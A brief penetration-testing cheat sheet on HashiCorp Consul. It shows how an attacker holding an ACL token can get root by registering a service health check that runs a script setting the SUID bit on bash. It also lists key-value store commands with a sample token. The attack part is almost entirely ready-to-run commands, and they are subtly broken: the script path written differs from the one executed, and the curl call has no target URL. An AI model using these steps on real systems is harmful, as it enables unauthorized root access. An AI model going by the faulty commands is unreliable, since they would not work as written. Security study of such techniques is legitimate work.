HashiCorp Consul Pentesting

Last modified: 2022-12-10

Privilege Escalation Web

An open-source service networking platform developed by HashiCorp. A default port is 8500.

Privilege Escalation

If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to privilege escalation.
First, create a script which changes the permission of ‘bash’.

echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh

Then curl.

curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}'

KV (Key/Value) Store

# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data